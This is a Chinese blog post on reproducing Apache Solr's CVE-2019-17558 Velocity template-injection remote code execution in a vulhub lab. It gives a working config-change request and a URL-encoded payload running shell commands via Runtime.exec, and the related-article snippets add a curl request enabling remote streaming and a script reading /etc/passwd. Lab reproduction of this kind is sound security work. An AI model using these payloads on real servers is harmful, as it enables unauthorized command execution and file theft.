solr 远程命令执行 (CVE-2019-17558)

最新推荐文章于 2023-07-23 19:55:04 发布
最新推荐文章于 2023-07-23 19:55:04 发布
阅读量453 收藏
点赞数 1
分类专栏: vulfovus 文章标签: solr lucene
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/128205394
版权

漏洞描述
Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。


影响范围
Apache Solr 5.0.0 ~8.3.1
漏洞利用
(1)默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。可以先通过如下API获取所有的核心在vulhub中核心就是demo通过下边API获取所有内核名称
第一步:访问特定url启用配置params.resource.loader.enabled,其中API路径包含core名称访问/solr/admin/cores?indexInfo=false&wt=json


(2)启用配置 params.resource.loader.enabled 为true,在url访问/solr/demo/config,burpsuit抓包 改成POST然后修改启动配置添加请求体

Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}


(3)通过Velocity模板执行命令,如hostname。修改exec(%27hostname%27)中的代码即可更改命令。
payload:

/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%20/tmp%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

若有收获,就点个赞吧

仲瑿
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90
08-04
背景:近日,ApacheSolr官方团队在最新的安全更新中披露了一则ApacheSolrDeserialization远程代…阅读数 1386557篇文章排名:
3.Solr基本命令(启动、停止、系统信息)
相互学习 共同进步
05-21 1656
两条命令是等效。如果默认值可以满足需要,则不必在启动时定义所有选项该start和restart命令有多种选择,在SolrCloud模式下运行,用一个实例配置集合,开始一个主机名或端口是不是默认并指向本地的ZooKeeper合奏该bin\solr脚本提供了许多选项,可以自定义服务器。
Apache Solr 远程命令执行
m0_63241485的博客
08-28 811
命令执行漏洞
【漏洞复现系列】Apache Solr SSRF文件读取漏洞(附0day POC)
qq_41703976的博客
03-19 1549
漏洞详情 Apache Solr <= 8.8.1均受影响,通杀所有版本,官方拒绝修复 通过Solr提供的API可以开启远程开启文件流读取: curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xx.xx.xx.xx:8984/solr/corename/config -H 'Content-type:application/json' 再传入文件
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
weixin_44047654的博客
03-03 1466
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
solr core admin命令
tyl314
12-12 1670
创建core http://localhost:8983/solr/admin/cores?action=CREATE &name=golife &instanceDir= &dataDir= &config= &schema= 刷新core http://localhost:8983/solr/admin/cores?action=RELOAD&core=golife
apache solr漏洞复现
Shanfenglan's blog
12-01 1444
文章目录1. 什么是Apache solr2. Apache solr rce CVE-2017-126292.1 利用3. Apache Solr 远程命令执行漏洞(CVE-2019-0193)3.1 利用4. Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)4.1 利用5. 任意文件读取参考文章 1. 什么是Apache solr Apache solr约等于ElecticSearch,是一个开源的搜索引擎。Solr 使用 Java 语言开发,主要基于 H
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。...文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
CVE-2019-0193 Apache-Solr via Velocity template RCE.MD
04-12
CVE-2019-0193 Apache-Solr via Velocity template RCE
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
solr漏洞合集
weixin_46626737的博客
07-02 628
在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)漏洞版本:Apache Solr 5.0.0 ~8.3.1。漏洞版本:Apache Solr < 8.2.0。3.solr远程代码执行CVE-2017-12629)5.solr的XXE漏洞(CVE-2017-12629)2.solr远程代码执行CVE-2019-0193)漏洞版本:Apache Solr < 7.1。漏洞版本:Apache Solr < 7.1。
漏洞复现----4、Apache Solr(velocity)远程命令执行(CVE-2019-17558)
七天
11-26 1540
文章目录一、Apache Solr 简介二、CVE-2019-17558简介三、漏洞复现 一、Apache Solr 简介 Solr是基于Lucene的面向企业搜索的web应用,是一个独立的企业级搜索应用服务器。它对外提供类似于Web-service的API接口。 用户可以通过HTTP请求,向搜索引擎服务器提交一定格式的XML文件,生成索引; 也可以通过HTTP GET操作提出查找请求,并得到Xml/json格式的返回结果。 Apache Solr下载安装 二、CVE-2019-17558简介 在Ap
Solr反序列化远程代码执行漏洞(360训练平台)
最新发布
FengZi_yu的博客
07-23 254
原理 Apache Solr中的ConfigAPI允许设置一个jmx.serviceUrl,它将创建一个新的JMXConnectorServerFactory,并通过“绑定”操作触发对目标RMI/LDAP服务器的调用。恶意的RMI服务器可以响应任意的对象,这些对象将在Solr端使用java的ObjectInputStream反序列化,这被认为是不安全的。这种类型的漏洞可以利用ysoserial工具。根据目标类路径,攻击者可以使用其中一个“gadget chain”来触发Solr端上的远程代码执行
【漏洞复现】Apache系列(二)之Solr漏洞复现
qq_45244158的博客
03-01 7206
【漏洞复现】Apache系列(二)之Solr漏洞复现
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
weixin_44047654的博客
02-20 968
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)
qq_51577576的博客
12-07 433
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE) Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令
Apache-Solr 任意文件读取漏洞复现
锋刃科技的博客
03-19 1133
影响版本 Apache Solr <= 8.8.1 环境搭建 这里使用docker进行安装 docker pull solr docker run --name solr2 -d -p 8081:8983 solr 然后进入容器 cd /opt/solr-8.7.0/server/solr/configsets/_default mkdir /var/solr/data/new_core cp -r conf /var/solr/data/new_cor...
cve-2019-6520编写poc
05-25
CVE-2019-6520是一个Apache Solr中的任意文件读取漏洞。攻击者可以利用该漏洞读取服务器上的任意文件。 下面是一个简单的Python脚本,可以利用该漏洞读取指定文件: ```python import requests url = "http://<target>/solr/+/get" params = { "getParams": { "content": "file:/<path to file>" } } response = requests.get(url, params=params) print(response.text) ``` 将`<target>`替换为目标服务器的IP地址或域名,将`<path to file>`替换为要读取的文件的路径。 例如,要读取`/etc/passwd`文件,可以使用以下命令: ```python import requests url = "http://example.com/solr/+/get" params = { "getParams": { "content": "file:/etc/passwd" } } response = requests.get(url, params=params) print(response.text) ``` 请注意,此脚本仅用于学习和研究目的,不应用于未经授权的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值